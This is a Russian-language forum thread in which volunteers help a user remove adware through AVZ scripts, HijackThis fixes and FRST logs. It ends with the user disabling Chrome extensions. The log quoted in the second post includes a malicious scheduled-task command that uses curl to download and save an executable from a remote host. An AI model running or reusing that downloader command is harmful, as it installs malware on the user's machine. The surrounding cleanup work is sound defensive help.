|
Компьютерный форум OSzone.net » Информационная безопасность » Лечение систем от вредоносных программ » вирус Войны престолов и рекламные баннеры |
|
|
вирус Войны престолов и рекламные баннеры
|
Новый участник Сообщения: 8 |
Профиль | Отправить PM | Цитировать
Доброго дня!
Прошу помощи в удаление из системы вируса: произвольно устанавливаются ярлыки на рабочем столе Войны престолов, при переходе в браузере по ссылкам открываются рекламные окна. Лог во вложении |
|
Отправлено: 14:01, 23-09-2017 |
Ветеран Сообщения: 763
|
Профиль | Сайт | Отправить PM | Цитировать Закройте все программы, временно выгрузите антивирус, файрволл и прочее защитное ПО.
Выполните скрипт в АВЗ (Файл - Выполнить скрипт): begin ExecuteFile('net.exe', 'stop tcpip /y', 0, 15000, true); if not IsWOW64 then begin SearchRootkit(true, true); SetAVZGuardStatus(True); end; QuarantineFile('C:\Users\Алина Ткаченко\appdata\roaming\curl\curl.exe',''); QuarantineFile('C:\Users\Алина Ткаченко\appdata\roaming\curl\curl_7_54.exe',''); QuarantineFile('C:\Users\Алина Ткаченко\AppData\Roaming\Microsoft\msi.exe',''); QuarantineFile('C:\WINDOWS\system32\drivers\mevrgooh.sys',''); DeleteFile('C:\WINDOWS\system32\Tasks\curl','64'); DeleteFile('C:\Users\Алина Ткаченко\AppData\Roaming\curl\curl_7_54.exe','32'); DeleteFile('C:\WINDOWS\system32\Tasks\curls','64'); DeleteFile('C:\WINDOWS\system32\Tasks\MSI','64'); DeleteFile('C:\Users\Алина Ткаченко\AppData\Roaming\Microsoft\msi.exe','32'); DeleteFile('C:\WINDOWS\system32\drivers\mevrgooh.sys','32'); DeleteFile('C:\Users\Алина Ткаченко\appdata\roaming\curl\curl_7_54.exe','32'); DeleteFile('C:\Users\Алина Ткаченко\appdata\roaming\curl\curl.exe','32'); DeleteService('mevrgooh'); BC_Activate; ExecuteSysClean; ExecuteWizard('SCU', 2, 3, true); BC_ImportALL; RebootWindows(true); end. Файл quarantine.zip из папки с распакованной утилитой AVZ отправьте с помощью этой формы или (если размер архива превышает 8 MB) на этот почтовый ящик: quarantine <at> safezone.cc (замените <at> на @) с указанием ссылки на тему в теме (заголовке) сообщения и с указанием пароля: virus в теле письма. "Пофиксите" в HijackThis (некоторые строки могут отсутствовать): R0 - HKU\.DEFAULT\Software\Microsoft\Internet Explorer\Main,Start Page = https://newtab.club O21 - ShellIconOverlayIdentifiers: 00asw - {472083B0-C522-11CF-8763-00608CC02F24} - (no file) O22 - Task (Ready): MSI - C:\Users\Алина Ткаченко\AppData\Roaming\Microsoft\msi.exe cnt=2 fts="Desktop\tn_tfile_me_torrent___.exe" (file missing) O22 - Task (Ready): curl - C:\Users\Алина Ткаченко\AppData\Roaming\curl\curl_7_54.exe -f -L "http://amtomil.ru/f.exe" -o "C:\Users\Алина Ткаченко\AppData\Roaming\curl\curl.exe" O22 - Task (Ready): curls - C:\Users\Алина Ткаченко\AppData\Roaming\curl\curl.exe O22 - Task (Ready): lidnkghmpmbmkjalooojbaefceoolghb - C:\Users\Алина Ткаченко\AppData\Roaming\lidnkghmpmbmkjalooojbaefceoolghb\python\pythonw.exe "C:\Users\Алина Ткаченко\AppData\Roaming\lidnkghmpmbmkjalooojbaefceoolghb\ml.py" --APPNAME="lidnkghmpmbmkjalooojbaefceoolghb" (file missing) Скачайте Farbar Recovery Scan Tool и сохраните на Рабочем столе. Примечание: необходимо выбрать версию, совместимую с Вашей операционной системой. Если Вы не уверены, какая версия подойдет для Вашей системы, скачайте обе и попробуйте запустить. Только одна из них запустится на Вашей системе. Запустите программу. Когда программа запустится, нажмите Yes для соглашения с предупреждением. Отметьте галочкой также "Shortcut.txt". Нажмите кнопку Scan. После окончания сканирования будут созданы отчеты FRST.txt, Addition.txt, Shortcut.txt в той же папке, откуда была запущена программа. Прикрепите отчеты к своему следующему сообщению. Подробнее читайте в этом руководстве. |
Отправлено: 13:58, 24-09-2017 | #2 |
Для отключения данного рекламного блока вам необходимо зарегистрироваться или войти с учетной записью социальной сети. Если же вы забыли свой пароль на форуме, то воспользуйтесь данной ссылкой для восстановления пароля. |
Новый участник Сообщения: 8
|
Профиль | Отправить PM | Цитировать Доброго дня!
Спасибо за помощь. Отчеты о проделанной работе во вложении |
Отправлено: 12:40, 25-09-2017 | #3 |
Новый участник Сообщения: 8
|
Профиль | Отправить PM | Цитировать Shortcut.txt превышает размер. Загрузить не удалось
|
Отправлено: 12:42, 25-09-2017 | #4 |
Ветеран Сообщения: 5255
|
Профиль | Отправить PM | Цитировать Упакуйте архиватором.
|
|
------- Отправлено: 13:31, 25-09-2017 | #5 |
Новый участник Сообщения: 8
|
Профиль | Отправить PM | Цитировать во вложении
апд. при переходе по ссылкам продолжаем грузится окно с рекламой |
Отправлено: 17:43, 25-09-2017 | #6 |
Ветеран Сообщения: 5255
|
Профиль | Отправить PM | Цитировать
Подробнее читайте в этом руководстве. Цитата epiepi:
|
|
------- Отправлено: 09:23, 26-09-2017 | #7 |
Новый участник Сообщения: 8
|
Профиль | Отправить PM | Цитировать Fixlog.txt во вложении
браузер Google Chrome |
Отправлено: 12:37, 26-09-2017 | #8 |
Ветеран Сообщения: 5255
|
Профиль | Отправить PM | Цитировать Если проблема сохраняется:
Отключите в Хроме все расширения, в т.ч. стандартные. Пропадет - включайте по одному, пока не найдете виновника. Название сообщите. |
------- Отправлено: 12:41, 26-09-2017 | #9 |
Новый участник Сообщения: 8
|
Профиль | Отправить PM | Цитировать Отключение расширений помогло. Но к сожалению выяснить кто виновник не удалось. Очень много плагинов. Удалила все. Полет нормальный.
Спасибо всем за оперативную помощь! |
Отправлено: 17:54, 26-09-2017 | #10 |
|
Участник сейчас на форуме | Участник вне форума | Автор темы | Сообщение прикреплено |
| |||||
Название темы | Автор | Информация о форуме | Ответов | Последнее сообщение | |
Раз в несколько дней появляется реклама игры "Войны престолов" | db-master | Лечение систем от вредоносных программ | 24 | 06-05-2015 21:03 | |
[решено] Рекламные баннеры вo всех браузерах. Блокировка сайтов. | lintu_julia | Лечение систем от вредоносных программ | 10 | 16-07-2013 17:51 | |
[решено] Блокировка сайтов. Рекламные баннеры... | :Dimon | Лечение систем от вредоносных программ | 13 | 15-07-2013 23:41 | |
[решено] Проблема. Рекламные баннеры слева. | Plamol | Лечение систем от вредоносных программ | 4 | 11-07-2013 12:35 | |
[решено] Не открываются сайты, перенаправляются ссылки, рекламные баннеры. | PticaOgnennaya | Лечение систем от вредоносных программ | 9 | 05-12-2012 16:12 |
|